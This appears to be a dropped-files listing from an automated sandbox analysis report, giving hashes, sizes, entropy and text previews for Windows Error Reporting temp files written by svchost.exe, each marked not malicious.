                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92818
                                                                                                                                                                    Entropy (8bit):3.052761739429161
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:fdzL/Ul+dxKpgpAovJLhhxkiR2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+R:fdzL/Ul+dxKpgpAovJLhhxki2k0n+sIg
                                                                                                                                                                    MD5:21C2FFE87D079A01D8FFDDC57E2F9924
                                                                                                                                                                    SHA1:F4196FDD021D51A48033765D65C11F7DD294B3F9
                                                                                                                                                                    SHA-256:396091A063C8CB88D38BB943AE97C0911D3E4DDA88ED934F306B5F0D60E4CBA5
                                                                                                                                                                    SHA-512:B4401157D99B96A1FB2ABE2A81BD3AC32CB622944E078CA50E9F2AF51F73102F201FB790AA6C30970D3A26048623B5515420FC4B06B08E8FEB1A3A33643D6358
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6DD.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.688007505339795
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW39IuQYzYVoWLHpYEZB/1tFiSp7wF9w/G3aST2MxQx4IIv3:2ZD6EgTFQaST2MGxfIv3
                                                                                                                                                                    MD5:420E05089E1575750849A21362F8E357
                                                                                                                                                                    SHA1:90A59A7D962E75C1E071249B1E18013A25536D76
                                                                                                                                                                    SHA-256:AC062D371344CAE2682D607092D3D53995D3CCC2CDE33866A8C14DCD6CC7391C
                                                                                                                                                                    SHA-512:9576FB8767CB62E763B8D16B0DE1D920202449AD68BF3CBC1523A95FE421FA5AFC07C350CBF180762363CA10C537ABA5BD53BCE7350B396C9A8AB88F93924E9E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6FD.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92836
                                                                                                                                                                    Entropy (8bit):3.0525865451155005
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ZzzX0l+dxKpgbfovJEhxxkiR2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+:ZzzX0l+dxKpgbfovJEhxxki2k0n+sI+T
                                                                                                                                                                    MD5:55CA44144857A7CA721D8843467526AD
                                                                                                                                                                    SHA1:49800D86AF1AF4AD6F57D2A374F4FA3C9C723337
                                                                                                                                                                    SHA-256:80A07A8B281C81BB36BD782BEC32B9B42FDC1D21F65561906E57FF05A327F3C9
                                                                                                                                                                    SHA-512:7177869B1A81542527E06592A146EDA4AB5757768B428B3F4065CFF6D3151339F2CA79B22D5911167A8EE517E911A2B66C61CA92DFE4CE165A39B84FFCA05FE3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA76B.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.687898127287182
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW3ILVzEtcY5Yd+WQ4HpYEZb1tFiJ7LFowj/ia9T7Mux/ILv3:2ZDxOuo+qa9T7MuxQLv3
                                                                                                                                                                    MD5:952B2E916F2AD8C2A50F9D497D400E1A
                                                                                                                                                                    SHA1:E20FB8A8BD7A8852271E38F55E19083020500D0B
                                                                                                                                                                    SHA-256:870EE269D208AB94FD3BED6C54E13AA68C39F935C432B5281560B2C098BB16AD
                                                                                                                                                                    SHA-512:9632B3C2E37C584309CC6AA601BA26C7B19EE8981BC43635A2FB3C5770B36533ACDBC0D7E87A940D1CB3B37727E99FD607A5F3C27E5A19CE604298289BD29A4A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA951.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92848
                                                                                                                                                                    Entropy (8bit):3.0523688829033273
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:2j0TTj+dxKpgb/o1JEhxxkiR2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mO:2j0TTj+dxKpgb/o1JEhxxki2k0n+sI+j
                                                                                                                                                                    MD5:163D4E0B6734CF2B3288A068D9CD226F
                                                                                                                                                                    SHA1:9E3EF01173C6A06D18EFA7D3A55831D2C4438088
                                                                                                                                                                    SHA-256:1367B3BC9C942DC18FD4B18862E25D6AE40797C503DC3D374BD9F4220442FB4F
                                                                                                                                                                    SHA-512:DA937DF5449195A5A9D9B79F500D4D31DFEADB7C34ABD84A33A3FADF76ECC24D71C843C563A8A33FFF723DE1E8F9AEA12FE24307294C344F7B50891357000760
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9EE.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6877501595157116
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWFWXl2yYHOYiSW7HpYEZQwtFi27pjFhwHIija5TrMYxpyIwv3:2ZDpypQhra5TrMYxLwv3
                                                                                                                                                                    MD5:A804A0F6ED3495D43E4BD75D65A7DF48
                                                                                                                                                                    SHA1:5268930AC520875358A261DF4BCDDACD6B4B3FFD
                                                                                                                                                                    SHA-256:FCC0D3899241CEC0DA8EEE9FCB5317443EFE0F6A017B2BB0157B687D3624FEE5
                                                                                                                                                                    SHA-512:F3C73CE57A02060746ACFCDA353E2D04AF6E15A953B2A2E0EC537FFEB8265F26DFC7313FC98D74DA20D12971ABDFD0E8536F15C9B21A5F5F7FF51908A7213624
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERADD7.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90412
                                                                                                                                                                    Entropy (8bit):3.0550984085706383
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:AnEmYB9d5tpgq/FocSJhVjiT2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+mW:AnEmYB9d5tpgq/FocSJhVjQ2k0n+sI+j
                                                                                                                                                                    MD5:60D7C70DF7AF98E639ACEDE41BA4D81A
                                                                                                                                                                    SHA1:F83B908F4F840451290A73A7A9603F69700A5FC9
                                                                                                                                                                    SHA-256:621785A1DC5D5A8C7095A581AD246E466E70E37ADF15108B17DB8B8906976497
                                                                                                                                                                    SHA-512:F63559CF87CF479CB76443F455FEBD1C438CA9E12C98B4361C05874CC310C9E17F20752DC8AAC8A8219E36C4A7A88D05686F8836FE90AF1A7C371E48E891D5EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE55.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6880066726724077
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWfRhPAGYlYpW2HjYEZCftFiO75FQwy1WFa+RxMd4/dIt6f3:2ZD/7S1e2a+RxMC/it03
                                                                                                                                                                    MD5:C4BD0D26EDCE9307E98223DE36CA9E96
                                                                                                                                                                    SHA1:9F01E0E05315664C8BEC5A5EEE988DB7825447C2
                                                                                                                                                                    SHA-256:51A87B7F9C87704CB28E8B38E78E47049E2E0926B6D8734E5398F3F18BBF5474
                                                                                                                                                                    SHA-512:CD39AC266E7645FFA924DE02C37275AF78A707171398FE56164B58008D2D183A8BD530BD8FB8993EBC1E6EAABFD80F1B2DCE74F0B766157BBECA9F1CD2C5E9BC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB163.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90452
                                                                                                                                                                    Entropy (8bit):3.0551313573840835
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:YETytBhdOtpgq/socSJjljih2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m/:YETytBhdOtpgq/socSJjljS2k0n+sI+i
                                                                                                                                                                    MD5:27CCCEA921BB4CB37E326C33BB079872
                                                                                                                                                                    SHA1:34119E24D6B19FD2402FF6C8F56C5E036ED05311
                                                                                                                                                                    SHA-256:34B57B4713AFFD64A8515A97C8D54ECAC2DF9F8C17D466A7BD4713E07BE1D44C
                                                                                                                                                                    SHA-512:73C9E4DF2B29BB10FF8EF2744D208BBE1BB9895C2CA4CDE933ABEF4AD52744341E3655E106ED37143F9DD185139E0F9ACE30CE80D1930DF14B532C5887754F0F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB377.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6887170041761697
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW2DYGdYtYgWdHqYEZsttFiL7IFJwYbRqJa+Tl4M1WnINb3:2ZDoKab6a+Tl4M1WINb3
                                                                                                                                                                    MD5:87BAE789D4BF4A3839E2A47EAE6E7BDB
                                                                                                                                                                    SHA1:C78EABA7BD3590A5EBC5CD228BCF172D21894747
                                                                                                                                                                    SHA-256:6FFBDAF18384AA1639CF38BD2129ABCA3A3D25B222C996466F3624CE1516F30C
                                                                                                                                                                    SHA-512:3846DF823C1BE2F6BEB54A18AC82D594E48FB21D1B498DCC72EF0517B0A91CA6E97807424B97BC0F0855B35EA0B5833FD38CC220EF04D9A947EAE587F3A73453
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB899.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90466
                                                                                                                                                                    Entropy (8bit):3.0552181802215492
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:WAQeJPC8hdmUpgLb+iXhJg7jig2k0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+Hm:WAQeJPC8hdmUpgLb+iXhJg7jD2k0n+sd
                                                                                                                                                                    MD5:7F406C997E68A246172D664312C7380B
                                                                                                                                                                    SHA1:70CF0EDC0DD850851CF057A52D9F08A91F75A6AD
                                                                                                                                                                    SHA-256:5D524AF96286AFF0199703DB34E3EF6878517AE757C58A3B5B1DEB5B7EAA3BFA
